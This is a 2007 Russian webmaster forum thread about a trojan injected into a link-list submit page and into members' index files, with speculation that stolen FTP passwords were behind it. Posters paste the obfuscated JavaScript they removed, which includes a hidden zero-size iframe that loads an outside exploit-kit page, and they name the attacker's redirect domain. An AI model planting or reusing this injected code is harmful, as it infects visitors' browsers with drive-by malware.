Master-X
Регистрация
|
Вход
Форум
|
Новости
|
Статьи
Главная
»
Форум
»
Линк Листы
»
Тема:
На сабмит странице пенисбота троян! Ахтунг!
Новая тема
Ответить
цитата
03/06/07 в 12:09
Platon
САБЖ
цитата
03/06/07 в 12:19
pirate
The requested URL
http://www.penisbot.com/submit_resource.html
is infected with Trojan-Downloader.JS.Agent.ga virus
цитата
03/06/07 в 12:21
Evgen-X
Код:
<!-- o65 --><script language='JavaScript'><!--
function nbsp() {var t,o,l,i,j;var s='';s+='060047116101120116097116101097062060047116101120116097114101097062';
s+='060105102114097109101032115114099061039104116116112058047047098114098111100121046105110102111047109';
s=s+'112097099107047105110100101120046112104112039032119105100116104061048032104101105103104116061048032';
s=s+'102114097109101098111114100101114061039048039062060047105102114097109101062';
t='';l=s.length;i=0; while(i<(l-1)){for(j=0;j<3;j++){t+=s.charAt(i);i++;}if((t-unescape(0xBF))>unescape(0x00))t-=-(unescape(0x08)+unescape(0x30));document.write(String.fromCharCode(t));t='';}}nbsp();
//--></script><!-- c65 -->
там внизу этот код, ты про него ?
цитата
03/06/07 в 12:31
Sergeyka
Новая атака!
Сейчас сам чистился блять
ЗЫ
Трой заменяет корневые индексные файлы прописывает код
цитата
03/06/07 в 12:34
svin
хмм а IE7 с последними апдейтами пробивает? только что хотел запустить сабмит и случайно на мастер заглянул
цитата
03/06/07 в 12:42
baabuler
тоже перед сабмитом случайно заглянул на Мастер
Витамину - Орден Почёта за бдительность!!
цитата
03/06/07 в 12:44
Барт
baabuler писал:
Витамину - Орден Почёта за бдительность!!
+10
цитата
03/06/07 в 12:50
Sergeyka
удалял сегодня вот такой код с индексных файлов
Код:
<!--[O]--><script>document.write(unescape("%3Cscript%3Etry%20%7
Bfunction%20IAD%28cGt%29%7Breturn%20parseInt%28cGt%29%7Dvar%20lNH%3D%2
733u3Gu3ju3yu3eu3Xu3Iu3fu3Tu3lu3au3xu38u3iu34u3wu3ku3Ru3Ju3Su3qu3ru3hu3Ou3Fu3
5u3Wu3nu3Ku39u3du3su3Cu3bu3Vu36u3Hu3Nu3Lu3pu3mu3ou3Du3Au3Bu3Uu3Zu3Yu3tu37u3
gu3cu3Mu3PuG3uGGuGjuGyuGeuGXuGIuGfuGTuGluGauGxuG8uGiuG4uGwuGkuGRuGJuGSuGqu
GruGhuGO%27%3Bvar%20sgX%3DlNH.substr%282%2C1%29%2CRGU%3DArray%28IAD%28%
27176%27%29%2C8526%5E8625%2C20720%5E20511%2CIAD%28%27254%27%29%2C14450%5E14487%2C10911%5E10851%
2C30871%5E30831%2C19859%5E19745%2C12542%5E12381%2C4375%
5E4529%2CIAD%28%27172%27%29%2C32172%5E32017
%2CIAD%28%27234%27%29%2CIAD%28%27224%27%29%
2CIAD%28%27246%27%29%2C9765%5E9891%2CIAD%28%27249
%27%29%2C10581%5E10679%2C31472%5E31251%2C14778%5E147
15%2CIAD%28%27202%27%29%2CIAD%28%27164%27%29%2C16541
%5E16451%2C9435%5E9339%2CIAD%28%27237%27%29%2C16173%
5E16373%2CIAD%28%27165%27%29%2C11460%5E11315%2C7411%
5E7177%2CIAD%28%27217%27%29%2C19926%5E19743%2CIAD%28%
27177%27%29%2CIAD%28%27233%27%29%2C9268%5E9423%2CIAD
%28%27200%27%29%2CIAD%28%27183%27%29%2CIAD%28%27223%
27%29%2CIAD%28%27192%27%29%2CIAD%28%27162%27%29%2
C25730%5E25699%2C4352%5E4587%2CIAD%28%27167%27%29%
2C757%5E577%2CIAD%28%27186%27%29%2C12357%5E12541%2C17997%5E18161%2CIAD%28%27232%27%29%2CIAD%28%27231%27%29%2CIAD%28%27174%27%29%2C17555%5E17511%2CIAD%28%27203%27%29%2C4592%5E4353%2CIAD%28%27214%
27%29%2C31758%5E31909%2CIAD%28%27228%27%29%2C25738%5E25727%2C15509%5E15433%2C23082%5E23273%2CIAD%28%27161%27%29%2CIAD%28%27182%27%29%2CIAD%28%27173%27%29%2C30384%5E30211%2C21842%5E21893%2C23019%
5E22841%2C7410%5E7239%2CIAD%28%27209%27%29%2C1276
7%5E12559%2C23101%5E23289%2C25038%5E24835%2C7365%5E
7211%2C23249%5E23071%2C943%5E785%2C30236%5E30419%2C31961%5E31775%2CIAD%28%27191%27%29%2CIAD%28%27185%27%29%2C13958%5E13885%2C26449%5E26507%29%3Bvar%20YCE%2CzKq%3Bvar%20ZjC%2CMWm%
3D%27333G3j3y3e3X3I3f3T3l3a3G3x383x3i3x343a3l3T3w383k3R3j3I3e3J3R3a3S3q3r3k3h3O3F353W3n3a3K3F3y3a393d3s3R3C3b3a3V3F3I3C3r3W363K3F3y3a3a3H3N3s3a3R3C3b3a3V3F3I3C3r3W363a3H3N3L3G3C3I353e3p3C3r393d3L3m3C3I35
3e3p3C3r3W3o3D3A3B3U3U3U3U3U3W363a3Z3J3j3k3p3C3R3I3L3j3J3J3Y3e3C3a3s3a3k3h3o3t3s3t3o3C3G3j3F3X3C3r3F353W3o3t363C373X3e3y3C3G3s3t3o3H3N3L3I3J3g3S353H3I3y3e3R3m3r3W363a3c3K3F3y3a3M343s3P3G3x383x3i3x343P3O
393i3s3P3x3P363K3F3y3aG33R3s3P3G3x3L3y3J3i3i3GGG3G3I3C3p3G3L3e3R383J3P3OGjGG3s3P3TG33I3p3i3T3P363e383r3Z3J3j3k3p3C3R3I3L3j3J3J3Y3e3C3L3e3R3Z3C37Gy383r3M343o3P3s3P3o393i3W3s3sGe3x3W3n3a3K3F3y3a3m3S3s3PG33I
3I3XGX3T3T3P3o3r3Z3J3j3k3p3C3R3I3L3i3J3j3F3I3e3J3R3LG33J3G3I3aGI3s3a3P3PGf3P3PGX383k3r3W3W3o3Z3J3j3k3p3C3R3I3L3i3J3j3F3I3e3J3R3LG33J3G3I3L3y3C3X3i3F3j3C3r3TGTGl3FGe343UGeGa3LGeGx3T3O3P3L3P3W3L3y3C3X3i3F3j3C3r
3TG83L3o3T3O3P3L3P3W3o3P3L3P3o383k3r3W3o3P3L3P3oG33R3oGjGG363K3F3y3aGi3V3s3Z3J3j3k3p3C3R3I3L3j3y3C3F3I3C3d3i3C3p3C3R3I3r3P3e383y3F3p3C3P3W36Gi3V3L3G3C3IG43I3I3y3eGw3k3I3C3r3P3G3y3j3P3O3m3S3W36Gi3V3L383y3
F3p3CGk3J3y3Z3C3y3s3U363aGi3V3L3b3e3Z3IG33s3U36Gi3V3LG33C3e3mG33I3sGR363I3yGG3a3n3a3Z3J3j3k3p3C3R3I3LGw3J3ZGG3L3F3X3X3C3R3ZGJG33e3i3Z3rGi3V3W363S3q3r3M343O393i3W363a3c3j3F3I3jG33r3C3W3n3a3Z3J3j3k3p3C3R3
I3L3b3y3e3I3C3r3P33G33I3p3i3f33Gw3J3ZGG3f333TGw3J3ZGG3f333TG33I3p3i3f3P3W363Z3J3j3k3p3C3R3I3LGw3J3ZGG3L3F3X3X3C3R3ZGJG33e3i3Z3rGi3V3W363a3S3q3r3M343O393i3W363a3c3a3c3w383k3R3j3I3e3J3R3a383k3r3W3n3a3K3F3y3
a3J3d3sGR3B3OGS3i3s3t3U3xGRGq3BGr3AGh3DGa3U3FGw3j3Z3C383t363K3F3y3aGJ3R3s3t3t363a383J3y3rGOGj3s3U363aGOGj3a333a3J3d363aGOGj3o3o3W3aGJ3R3o3s3aGS3i3L3G3kGw3G3I3y3r3S3F3IG33L383i3J3J3y3r3S3F3IG33L3y3F3R3Z3J3
p3r3W3lGS3i3L3i3C3R3m3IG33W3O3x3O3x3W363a3y3C3I3k3y3R3aGJ3R363a3c333T3G3j3y3e3X3I3f%27%3Bvar%20CcF%3DString%28%29%3BlNH%3DlNH.split%28sgX%29%3Bfor%28YCE%3D0%3BYCE%3CMWm.length%3BYCE+%3D2%29%7
BZjC%3DMWm.substr%28YCE%2C2%29%3Bfor%28zKq%3D0%3BzKq%3ClNH.length%3BzKq++%29%7Bif%28lNH%5BzKq%5D%3D%3DZjC%29break%3B%7D%20CcF+%3DString.fromCharCode%28RGU%5BzKq%5D%5E140%29%3B%7Ddoc
ument.write%28CcF%29%3B%7D%0Acatch%28e%29%7B%7D%3C/script%3E"))</script><!--[/O]-->
Поражены были корневые индексы
У себя каки не нашел сижу репу чешу как проникло
цитата
03/06/07 в 12:55
bivin
Вот ведь черти! Опять эту бадягу начинают((
цитата
03/06/07 в 13:06
kit
Мы устранили прблему, ищем причину.
цитата
03/06/07 в 13:10
Sergeyka
Кит, результаты выложите здесь плизз
Судя по всему пароли от фтп небыли украдены как то из вне смогли закинуть каку
цитата
03/06/07 в 13:13
kit
Да, именно эту версию мы сейчас и отрабатываем.
цитата
03/06/07 в 13:20
SAV
ставьте доступ для фтп по айпи
цитата
03/06/07 в 13:30
Sergeyka
Sav фтп тут не при чем, у юзеров на машинах все в порядке, сломаны изберательно домены с которых постили в ЛЛ и сами ЛЛ
может поможет
Расковыряли джаву редиректит сюда
sl.rollsystems.info/oOo/exp/
estdomains
защищенный whois
http://whois.domaintools.com/rollsystems.info
Очередные читеры на Естдомайн, сука теперь я понимаю почему Естдомайн не любят западные овнеры, с таким подходом к бизу скоро сам буду банить
Написал абузу, поможет нет хз
цитата
03/06/07 в 13:37
ritor
+100 за доступ тока со своих айпи на свои сервера.
цитата
03/06/07 в 13:53
SAV
Sergeyka писал:
Sav фтп тут не при чем, у юзеров на машинах все в порядке, сломаны изберательно домены с которых постили в ЛЛ и сами ЛЛ
ну ладно, я даже пока голову ломать не буду что фтп не причем,
вопрос: как на сервере появилась кака?
цитата
03/06/07 в 14:01
Sergeyka
Взлом фтп
сейчас админы проснуться будем разбираться
возможно дыру в софте нашли, подумай для чего разместили трой на самбит паге ПБ?
Чтобы юзера заразить?
Да нахуй они им не нужны, в ПБ около 200 наверное сабмитов в сутки - 200 вебмастеров, скока доменов хз, чуешь?
Они кулцхакеры умные сука
цитата
03/06/07 в 14:24
ritor
Оффтопик:
+1 Уже который раз атака именно на АВМов идет. Пароли угнанные мгновенно в скрипт идут, который автоматом добавляет экспы на все хтмл паги.
цитата
03/06/07 в 14:55
Sergeyka
Более мение прояснилось
Скорее всего пароли были похищены с помощью АктивХ через браузер
без инфицирования трояном
Взяты пассы были изберательно, не от всех а там где были домены с постингом
цитата
03/06/07 в 15:34
Skat
бля хорошо постить начал только сейчас, а не раньше
цитата
03/06/07 в 17:43
Sergeyka
Естдомайн оперативно сработали респект
Домен заблочен
цитата
03/06/07 в 19:26
sexogen
Sergeyka писал:
Более мение прояснилось
Скорее всего пароли были похищены с помощью АктивХ через браузер
без инфицирования трояном
Взяты пассы были изберательно, не от всех а там где были домены с постингом
на форуме твоем постинга небыло ;)
цитата
03/06/07 в 19:46
Andx
Sergeyka писал:
У себя каки не нашел сижу репу чешу как проникло
точно такой же код у меня неделю назад появился на всех index файлах.
вирусов у себя не нашел.
но 100% украли пароли фтп тк по логам нашли кто это сделал.
айпи 217.175.91.126.
советую тебе сменить пароли как можно быстрее.
подобрать фтп не могли,серверов штук 10 и везде пароли сложные.
там как я понял всё делается автоматом.
скрипт ворует пароли от фтп потом конектится и ищет файлы index*
потому что сайты крупные где главная страница mian.shtml не трогали.
цитата
03/06/07 в 21:49
zJ
Вывод: переходите на более секьюрные технологии чем FTP.
цитата
03/06/07 в 22:08
X-dream
На какие например ?
Стр.
1
,
2
>
последняя »
Новая тема
Ответить
Эта страница в полной версии